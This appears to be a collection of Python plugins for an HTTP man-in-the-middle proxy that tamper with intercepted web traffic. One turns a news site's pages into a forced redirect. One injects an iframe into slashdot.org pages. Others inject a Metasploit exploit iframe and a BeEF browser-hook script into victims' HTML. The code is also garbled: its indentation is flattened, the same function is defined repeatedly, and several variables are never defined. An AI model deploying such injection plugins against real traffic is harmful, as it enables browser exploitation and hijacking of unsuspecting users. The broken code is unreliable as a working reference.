def doResponse(session, request_header, response_header, data):
changed = 0
stop = 0
i = 1
# Check to see if we've got the right target site
target = "www.foxnews.com"
request_match = (("Host",target),)
redirect_url = "http://www.cnn.com"
if header.headertest(request_header,request_match):
# We could make sure only to do this if the browser was getting a web page.
response_match = (("Content-type","TEXT/HTML"),)
if header.headertest( response_header,response_match ):
# Check the response code line.
response_code_line = response_header[0][1]
(protover,response_code,reason) = response_code_line.split(" ")
print ("Response code line had these elements --%s-- --%s-- --%s\n" % (protover,response_code,reason) )
# Make sure we are only doing this on a 200 message.
if response_code != "200":
ml.jjlog.debug("Response code was %s, not 200, so we won't inject here\n" % response_code)
return(response_header, data, changed, stop)
# Change the response code to a 30x redirect.
# Choose one of these two.
response_code = 307
reason = "Temporary Redirect\n"
#response_code = 301
#reason = "Moved Permanently"
header.headerfix(response_header,"Response",("%s %s %s" % (protover,response_code,reason)) )
# Check if there is a Location header already?
# TODO: make a routine that inserts a new header after a specific line.
if header.headerget(response_header,"Location") and redirect_url:
header.headerfix( response_header, "Location", redirect_url + "\n")
ml.jjlog.debug("Replaced the location: %s\n" % redirect_url)
else:
response_header.append( ("Location",redirect_url + "\n") )
ml.jjlog.debug("Appended our own location: %s\n" % redirect_url)
# We have changed the header and we don't want any other plugins to touch it.
# TODO: Decide on how to do priority/dependencies/ordering so redirects go first.
changed = 1
stop = 1
return(response_header, data, changed, stop)
def doResponse(session, request_header, response_header, data):
changed = 0
stop = 0
i = 1
# Check to see if we've got the right target site
target = "slashdot.org"
request_match = (("Host",target),)
# Set up the IFRAME to inject into the HTML
# TODO: Set the traffic capture code that gets my IP address to log it into
# some kind of global or class variable.
inserted_url = "http://www.inguardians.com/tools/logo-themiddler-150px.jpg"
iframe = '''<iframe height=103 width=150 src="%s"></iframe>''' % (inserted_url)
if header.headertest(request_header,request_match):
# We could make sure only to do this if the browser was getting a web page.
response_match = (("Content-type","TEXT/HTML"),)
if header.headertest( response_header,response_match ):
# Check the response code line.
response_code_line = response_header[0][1]
(protover,response_code,reason) = response_code_line.split(" ",2)
ml.jjlog.debug("Response code line had these elements --%s-- --%s-- --%s\n" % (protover,response_code,reason) )
# Make sure we are only doing this on a 200 message.
# There's no point to injecting into a 30x redirect!
if response_code != "200":
return(response_header, data, changed, stop)
ml.jjlog.debug("Preparing to inject iframe into request for %s" % target)
### MANIPULATE DATA - INSERT SCRIPT
data = re.sub(r'\<body\>', r'<body>' + iframe, data)
changed = 1
### Correct the content-length.
header.headerfix(response_header, "Content-Length", str(len(data)))
# We have changed the header and we don't want any other plugins to touch it.
# TODO: Decide on how to do priority/dependencies/ordering so redirects go first.
changed = 1
stop = 1
return(response_header, data, changed, stop)
def doResponse(session, request_header, response_header, data):
changed = 0
stop = 0
### DETERMINE IF WE NEED TO CHANGE DATA
if header.headertest(request_header, request_match) & header.headertest(response_header, response_match):
### MANIPULATE DATA
data = redirect_code
print("User has been redirected to " + redirect_url)
### RETURN DATA
if changed:
header.headerfix(response_header, "Content-Length", str(len(data)))
return(response_header, data, changed, stop)
def doResponse(session, request_header, response_header, data):
changed = 0
stop = 0
### DETERMINE IF WE NEED TO CHANGE DATA
if header.headertest(request_header, request_match) & header.headertest(response_header, response_match):
### MANIPULATE DATA - INSERT SCRIPT
data = re.sub('</body>', code1 + '</body>', data)
changed = 1
print("Metasploit iframe injected")
### RETURN DATA
if changed:
header.headerfix(response_header, "Content-Length", str(len(data)))
return(response_header, data, changed, stop)
def doResponse(session, request_header, response_header, data):
changed = 0
stop = 0
### DETERMINE IF WE NEED TO CHANGE DATA
if header.headertest(request_header, request_match) & header.headertest(response_header, response_match):
### MANIPULATE DATA - INSERT SCRIPT
data = re.sub('</body>', code1 + '</body>', data)
changed = 1
print("BeEF hook injected")
### RETURN DATA
if changed:
header.headerfix(response_header, "Content-Length", str(len(data)))
return(response_header, data, changed, stop)
def doRequest(session, request_header, data):
changed = 0
stop = 0
# Bug - this routine is only changing the Host header, but isn't
# changing the socket's destination. Further, the host
# header shouldn't contain a full URL, just a hostname.
# Remember, the Host header was an HTTP/1.1 addition
# intended to tell the remote server which virtual
# host the browser was requesting.
#
if 0 and header.headertest(request_header, request_match):
### MANIPULATE DATA
changed = 1
stop = 1
header.headerfix(request_header, "Host", redirect_url + '\r\n')
print("User request URL has been rewritten to " + redirect_url)
### RETURN DATA
return (request_header, data, changed, stop)
